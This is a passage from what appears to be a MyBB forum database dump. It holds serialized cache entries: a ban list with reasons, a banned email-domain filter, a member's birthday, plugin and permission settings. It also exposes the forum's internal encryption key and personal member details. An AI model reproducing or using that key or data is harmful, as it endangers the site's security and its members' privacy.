email)\";}i:157;a:10:{s:3:\"uid\";s:3:\"157\";s:3:\"gid\";s:2:\"14\";s:8:\"oldgroup\";s:1:\"5\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1346769145\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:7:\"Spammer\";}i:176;a:10:{s:3:\"uid\";s:3:\"176\";s:3:\"gid\";s:1:\"0\";s:8:\"oldgroup\";s:1:\"5\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1346968852\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:12:\"Fake E-Mails\";}i:177;a:10:{s:3:\"uid\";s:3:\"177\";s:3:\"gid\";s:1:\"0\";s:8:\"oldgroup\";s:1:\"5\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1346968852\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:12:\"Fake E-Mails\";}i:179;a:10:{s:3:\"uid\";s:3:\"179\";s:3:\"gid\";s:1:\"0\";s:8:\"oldgroup\";s:1:\"5\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1347077544\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:10:\"Spam Email\";}i:211;a:10:{s:3:\"uid\";s:3:\"211\";s:3:\"gid\";s:1:\"0\";s:8:\"oldgroup\";s:1:\"5\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1349496249\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:29:\"20 Minute Mail? Good Bye Spam\";}i:231;a:10:{s:3:\"uid\";s:3:\"231\";s:3:\"gid\";s:1:\"7\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1350428750\";s:7:\"bantime\";s:5:\"0-2-0\";s:6:\"lifted\";s:10:\"1355007900\";s:6:\"reason\";s:46:\"Take a look here: http://pastebin.com/sftb2X5x\";}i:243;a:10:{s:3:\"uid\";s:3:\"243\";s:3:\"gid\";s:1:\"7\";s:8:\"oldgroup\";s:1:\"5\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1349734513\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:9:\"gujvgrrgt\";}i:203;a:10:{s:3:\"uid\";s:3:\"203\";s:3:\"gid\";s:1:\"7\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:11:\"18,17,20,13\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:2:\"61\";s:8:\"dateline\";s:10:\"1349924553\";s:7:\"bantime\";s:5:\"0-0-1\";s:6:\"lifted\";s:10:\"1381460520\";s:6:\"reason\";s:28:\"Threatning to DDoS our site.\";}i:249;a:10:{s:3:\"uid\";s:3:\"249\";s:3:\"gid\";s:1:\"7\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1350093593\";s:7:\"bantime\";s:5:\"0-2-0\";s:6:\"lifted\";s:10:\"1355367540\";s:6:\"reason\";s:52:\"Kicked out of AF but still active on AF? Very legit.\";}i:254;a:10:{s:3:\"uid\";s:3:\"254\";s:3:\"gid\";s:2:\"14\";s:8:\"oldgroup\";s:1:\"9\";s:19:\"oldadditionalgroups\";s:2:\"17\";s:15:\"olddisplaygroup\";s:2:\"17\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1351630198\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:25:\"Scammers are not welcome.\";}i:266;a:10:{s:3:\"uid\";s:3:\"266\";s:3:\"gid\";s:1:\"7\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1350450377\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:128:\"Oh Off course you can talk to my staff by taking their Skype IDs and not PMing them also offering them to leave LH and go on AF.\";}i:251;a:10:{s:3:\"uid\";s:3:\"251\";s:3:\"gid\";s:2:\"14\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1350525399\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:60:\"Sorry but you are not welcome to LH due to security reasons.\";}i:224;a:10:{s:3:\"uid\";s:3:\"224\";s:3:\"gid\";s:2:\"14\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1350760616\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:26:\"Thanks for the offer. Bye.\";}i:214;a:10:{s:3:\"uid\";s:3:\"214\";s:3:\"gid\";s:2:\"14\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:2:\"17\";s:15:\"olddisplaygroup\";s:1:\"2\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1351038873\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:9:\"Leeching.\";}i:302;a:10:{s:3:\"uid\";s:3:\"302\";s:3:\"gid\";s:2:\"14\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1352253808\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:40:\"Leechers not allowed + Multi Accounting \";}i:328;a:10:{s:3:\"uid\";s:3:\"328\";s:3:\"gid\";s:2:\"14\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1352258991\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:35:\"Multi Accounting. Do not come back!\";}}'); INSERT INTO mybb_datacache VALUES('bannedemails', 'a:65:{i:28;a:2:{s:3:\"fid\";s:2:\"28\";s:6:\"filter\";s:15:\"*hackforums.net\";}i:5;a:2:{s:3:\"fid\";s:1:\"5\";s:6:\"filter\";s:8:\"*fbi.gov\";}i:29;a:2:{s:3:\"fid\";s:2:\"29\";s:6:\"filter\";s:12:\"*teleworm.us\";}i:9;a:2:{s:3:\"fid\";s:1:\"9\";s:6:\"filter\";s:4:\"*.ru\";}i:10;a:2:{s:3:\"fid\";s:2:\"10\";s:6:\"filter\";s:10:\"*myway.com\";}i:11;a:2:{s:3:\"fid\";s:2:\"11\";s:6:\"filter\";s:16:\"*mailinator2.com\";}i:12;a:2:{s:3:\"fid\";s:2:\"12\";s:6:\"filter\";s:14:\"*sogetthis.com\";}i:13;a:2:{s:3:\"fid\";s:2:\"13\";s:6:\"filter\";s:15:\"*mailinator.net\";}i:16;a:2:{s:3:\"fid\";s:2:\"16\";s:6:\"filter\";s:17:\"*spamherelots.com\";}i:15;a:2:{s:3:\"fid\";s:2:\"15\";s:6:\"filter\";s:25:\"*thisisnotmyrealemail.com\";}i:17;a:2:{s:3:\"fid\";s:2:\"17\";s:6:\"filter\";s:11:\"*spambox.us\";}i:18;a:2:{s:3:\"fid\";s:2:\"18\";s:6:\"filter\";s:13:\"*NoSpamfor.Us\";}i:19;a:2:{s:3:\"fid\";s:2:\"19\";s:6:\"filter\";s:23:\"*guerrillamailblock.com\";}i:20;a:2:{s:3:\"fid\";s:2:\"20\";s:6:\"filter\";s:12:\"*jetable.com\";}i:21;a:2:{s:3:\"fid\";s:2:\"21\";s:6:\"filter\";s:12:\"*hotmial.com\";}i:22;a:2:{s:3:\"fid\";s:2:\"22\";s:6:\"filter\";s:11:\"*hotmai.com\";}i:23;a:2:{s:3:\"fid\";s:2:\"23\";s:6:\"filter\";s:14:\"*mintemail.com\";}i:24;a:2:{s:3:\"fid\";s:2:\"24\";s:6:\"filter\";s:13:\"*meltmail.com\";}i:25;a:2:{s:3:\"fid\";s:2:\"25\";s:6:\"filter\";s:9:\"*sify.com\";}i:26;a:2:{s:3:\"fid\";s:2:\"26\";s:6:\"filter\";s:13:\"*binkmail.com\";}i:27;a:2:{s:3:\"fid\";s:2:\"27\";s:6:\"filter\";s:16:\"*spamgourmet.com\";}i:30;a:2:{s:3:\"fid\";s:2:\"30\";s:6:\"filter\";s:15:\"*rediffmail.com\";}i:31;a:2:{s:3:\"fid\";s:2:\"31\";s:6:\"filter\";s:11:\"*spamfree24\";}i:32;a:2:{s:3:\"fid\";s:2:\"32\";s:6:\"filter\";s:12:\"*jetable.org\";}i:33;a:2:{s:3:\"fid\";s:2:\"33\";s:6:\"filter\";s:14:\"*tempinbox.com\";}i:34;a:2:{s:3:\"fid\";s:2:\"34\";s:6:\"filter\";s:15:\"*mailexpire.com\";}i:35;a:2:{s:3:\"fid\";s:2:\"35\";s:6:\"filter\";s:12:\"*yopmail.com\";}i:36;a:2:{s:3:\"fid\";s:2:\"36\";s:6:\"filter\";s:12:\"*bofthew.com\";}i:37;a:2:{s:3:\"fid\";s:2:\"37\";s:6:\"filter\";s:14:\"*safe-mail.net\";}i:38;a:2:{s:3:\"fid\";s:2:\"38\";s:6:\"filter\";s:15:\"*trash-mail.com\";}i:39;a:2:{s:3:\"fid\";s:2:\"39\";s:6:\"filter\";s:8:\"*spam.la\";}i:40;a:2:{s:3:\"fid\";s:2:\"40\";s:6:\"filter\";s:14:\"*mailcatch.com\";}i:41;a:2:{s:3:\"fid\";s:2:\"41\";s:6:\"filter\";s:14:\"*goemailgo.com\";}i:42;a:2:{s:3:\"fid\";s:2:\"42\";s:6:\"filter\";s:17:\"*thankyou2010.com\";}i:43;a:2:{s:3:\"fid\";s:2:\"43\";s:6:\"filter\";s:13:\"*emailthe.net\";}i:44;a:2:{s:3:\"fid\";s:2:\"44\";s:6:\"filter\";s:9:\"*gmil.com\";}i:45;a:2:{s:3:\"fid\";s:2:\"45\";s:6:\"filter\";s:16:\"*dispostable.com\";}i:46;a:2:{s:3:\"fid\";s:2:\"46\";s:6:\"filter\";s:14:\"*anonymbox.com\";}i:47;a:2:{s:3:\"fid\";s:2:\"47\";s:6:\"filter\";s:10:\"*lhsdv.com\";}i:48;a:2:{s:3:\"fid\";s:2:\"48\";s:6:\"filter\";s:10:\"*gamil.com\";}i:49;a:2:{s:3:\"fid\";s:2:\"49\";s:6:\"filter\";s:11:\"*0-mail.com\";}i:50;a:2:{s:3:\"fid\";s:2:\"50\";s:6:\"filter\";s:19:\"*makemetheking.com \";}i:51;a:2:{s:3:\"fid\";s:2:\"51\";s:6:\"filter\";s:14:\"*djrabbit.info\";}i:52;a:2:{s:3:\"fid\";s:2:\"52\";s:6:\"filter\";s:15:\"*quickinbox.com\";}i:53;a:2:{s:3:\"fid\";s:2:\"53\";s:6:\"filter\";s:15:\"*zippymail.info\";}i:54;a:2:{s:3:\"fid\";s:2:\"54\";s:6:\"filter\";s:15:\"*mailinator.com\";}i:55;a:2:{s:3:\"fid\";s:2:\"55\";s:6:\"filter\";s:19:\"*emeraldwebmail.com\";}i:56;a:2:{s:3:\"fid\";s:2:\"56\";s:6:\"filter\";s:13:\"*bobmail.info\";}i:57;a:2:{s:3:\"fid\";s:2:\"57\";s:6:\"filter\";s:14:\"*suremail.info\";}i:58;a:2:{s:3:\"fid\";s:2:\"58\";s:6:\"filter\";s:10:\"*pjjkp.com\";}i:59;a:2:{s:3:\"fid\";s:2:\"59\";s:6:\"filter\";s:8:\"*163.com\";}i:60;a:2:{s:3:\"fid\";s:2:\"60\";s:6:\"filter\";s:16:\"*tradermail.info\";}i:61;a:2:{s:3:\"fid\";s:2:\"61\";s:6:\"filter\";s:8:\"*hush.ai\";}i:62;a:2:{s:3:\"fid\";s:2:\"62\";s:6:\"filter\";s:18:\"*incognitomail.org\";}i:63;a:2:{s:3:\"fid\";s:2:\"63\";s:6:\"filter\";s:16:\"*wegwerfemail.de\";}i:64;a:2:{s:3:\"fid\";s:2:\"64\";s:6:\"filter\";s:16:\"*safetymail.info\";}i:65;a:2:{s:3:\"fid\";s:2:\"65\";s:6:\"filter\";s:15:\"*keepmymail.com\";}i:66;a:2:{s:3:\"fid\";s:2:\"66\";s:6:\"filter\";s:10:\"*jnxjn.com\";}i:67;a:2:{s:3:\"fid\";s:2:\"67\";s:6:\"filter\";s:16:\"*appspotmail.com\";}i:69;a:2:{s:3:\"fid\";s:2:\"69\";s:6:\"filter\";s:6:\"*o2.pl\";}i:73;a:2:{s:3:\"fid\";s:2:\"73\";s:6:\"filter\";s:5:\"*.edu\";}i:74;a:2:{s:3:\"fid\";s:2:\"74\";s:6:\"filter\";s:6:\"*dumps\";}i:75;a:2:{s:3:\"fid\";s:2:\"75\";s:6:\"filter\";s:8:\"*gmx.com\";}i:83;a:2:{s:3:\"fid\";s:2:\"83\";s:6:\"filter\";s:12:\"*speed.1s.fr\";}i:87;a:2:{s:3:\"fid\";s:2:\"87\";s:6:\"filter\";s:15:\"*rocketmail.com\";}}'); INSERT INTO mybb_datacache VALUES('birthdays', 'a:1:{s:5:\"10-11\";a:1:{s:5:\"users\";a:1:{i:0;a:6:{s:3:\"uid\";s:3:\"199\";s:8:\"username\";s:12:\"Anonymous™\";s:9:\"usergroup\";s:1:\"2\";s:12:\"displaygroup\";s:2:\"17\";s:8:\"birthday\";s:10:\"10-11-1994\";s:4:\"bday\";s:5:\"10-11\";}}}}'); INSERT INTO mybb_datacache VALUES('groupleaders', 'a:5:{i:232;a:1:{i:0;a:5:{s:3:\"lid\";s:1:\"5\";s:3:\"gid\";s:2:\"12\";s:3:\"uid\";s:3:\"232\";s:16:\"canmanagemembers\";s:1:\"1\";s:17:\"canmanagerequests\";s:1:\"1\";}}i:62;a:1:{i:0;a:5:{s:3:\"lid\";s:1:\"7\";s:3:\"gid\";s:2:\"13\";s:3:\"uid\";s:2:\"62\";s:16:\"canmanagemembers\";s:1:\"1\";s:17:\"canmanagerequests\";s:1:\"1\";}}i:61;a:1:{i:0;a:5:{s:3:\"lid\";s:1:\"4\";s:3:\"gid\";s:2:\"17\";s:3:\"uid\";s:2:\"61\";s:16:\"canmanagemembers\";s:1:\"1\";s:17:\"canmanagerequests\";s:1:\"1\";}}i:100;a:1:{i:0;a:5:{s:3:\"lid\";s:2:\"10\";s:3:\"gid\";s:2:\"20\";s:3:\"uid\";s:3:\"100\";s:16:\"canmanagemembers\";s:1:\"1\";s:17:\"canmanagerequests\";s:1:\"1\";}}i:228;a:1:{i:0;a:5:{s:3:\"lid\";s:2:\"11\";s:3:\"gid\";s:2:\"21\";s:3:\"uid\";s:3:\"228\";s:16:\"canmanagemembers\";s:1:\"1\";s:17:\"canmanagerequests\";s:1:\"1\";}}}'); INSERT INTO mybb_datacache VALUES('threadprefixes', 'a:0:{}'); INSERT INTO mybb_datacache VALUES('forumsdisplay', 'a:1:{i:-1;a:1:{s:8:\"modtools\";i:1;}}'); INSERT INTO mybb_datacache VALUES('plugins', 'a:1:{s:6:\"active\";a:49:{s:7:\"contact\";s:7:\"contact\";s:8:\"hotwords\";s:8:\"hotwords\";s:9:\"modreplog\";s:9:\"modreplog\";s:7:\"hellban\";s:7:\"hellban\";s:9:\"welcomepm\";s:9:\"welcomepm\";s:5:\"mceap\";s:5:\"mceap\";s:6:\"ip_man\";s:6:\"ip_man\";s:12:\"donationpage\";s:12:\"donationpage\";s:13:\"prune_members\";s:13:\"prune_members\";s:7:\"spoiler\";s:7:\"spoiler\";s:7:\"pmadmin\";s:7:\"pmadmin\";s:14:\"privatewarning\";s:14:\"privatewarning\";s:9:\"admhijack\";s:9:\"admhijack\";s:4:\"gcvt\";s:4:\"gcvt\";s:13:\"mypermissions\";s:13:\"mypermissions\";s:9:\"modNotify\";s:9:\"modNotify\";s:6:\"fassim\";s:6:\"fassim\";s:18:\"ForumsRequirements\";s:18:\"ForumsRequirements\";s:14:\"strictUsername\";s:14:\"strictUsername\";s:8:\"tab_menu\";s:8:\"tab_menu\";s:6:\"ficons\";s:6:\"ficons\";s:7:\"myflood\";s:7:\"myflood\";s:13:\"my_ad_manager\";s:13:\"my_ad_manager\";s:12:\"my_meta_tags\";s:12:\"my_meta_tags\";s:7:\"deny_ip\";s:7:\"deny_ip\";s:10:\"sticky_man\";s:10:\"sticky_man\";s:11:\"ad_in_close\";s:11:\"ad_in_close\";s:16:\"moderation_posts\";s:16:\"moderation_posts\";s:9:\"mods_page\";s:9:\"mods_page\";s:10:\"self_close\";s:10:\"self_close\";s:13:\"profilegroups\";s:13:\"profilegroups\";s:13:\"repeat_report\";s:13:\"repeat_report\";s:6:\"repoco\";s:6:\"repoco\";s:6:\"addbot\";s:6:\"addbot\";s:13:\"monthly_stats\";s:13:\"monthly_stats\";s:9:\"editperms\";s:9:\"editperms\";s:9:\"hidelinks\";s:9:\"hidelinks\";s:11:\"block_proxy\";s:11:\"block_proxy\";s:14:\"goodbyespammer\";s:14:\"goodbyespammer\";s:9:\"easyrefer\";s:9:\"easyrefer\";s:3:\"amp\";s:3:\"amp\";s:11:\"onlinetoday\";s:11:\"onlinetoday\";s:12:\"lasteditlock\";s:12:\"lasteditlock\";s:10:\"google_seo\";s:10:\"google_seo\";s:16:\"courtesyedittime\";s:16:\"courtesyedittime\";s:15:\"my_proxy_killer\";s:15:\"my_proxy_killer\";s:14:\"editrepcomment\";s:14:\"editrepcomment\";s:11:\"achivements\";s:11:\"achivements\";s:13:\"hideUntilPost\";s:13:\"hideUntilPost\";}}'); INSERT INTO mybb_datacache VALUES('internal_settings', 'a:1:{s:14:\"encryption_key\";s:32:\"ZBOUGPxw7cdV7WhItjSSRGxhgcwJeET4\";}'); INSERT INTO mybb_datacache VALUES('version_history', 'a:24:{i:0;s:1:\"1\";i:1;s:1:\"2\";i:2;s:1:\"3\";i:3;s:1:\"4\";i:4;s:1:\"5\";i:5;s:1:\"6\";i:6;s:1:\"7\";i:7;s:1:\"8\";i:8;s:1:\"9\";i:9;s:2:\"10\";i:10;s:2:\"11\";i:11;s:2:\"12\";i:12;s:2:\"13\";i:13;s:2:\"14\";i:14;s:2:\"15\";i:15;s:2:\"16\";i:16;s:2:\"17\";i:17;s:2:\"18\";i:18;s:2:\"19\";i:19;s:2:\"20\";i:20;s:2:\"21\";i:21;s:2:\"22\";i:22;s:2:\"23\";i:23;s:2:\"24\";}'); INSERT INTO mybb_datacache VALUES('mostonline', 'a:2:{s:8:\"numusers\";i:909;s:4:\"time\";i:1349617758;}'); INSERT INTO mybb_datacache VALUES('forumpermissions', 'a:48:{i:0;i:0;i:50;a:13:{i:1;a:18:{s:3:\"pid\";s:3:\"982\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"983\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:9;a:18:{s:3:\"pid\";s:3:\"987\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:5;a:18:{s:3:\"pid\";s:3:\"984\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:6;a:18:{s:3:\"pid\";s:3:\"985\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:1:\"6\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"1\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"986\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"988\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:12;a:18:{s:3:\"pid\";s:3:\"989\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:13;a:18:{s:3:\"pid\";s:3:\"990\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"991\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:17;a:18:{s:3:\"pid\";s:3:\"992\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"993\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12: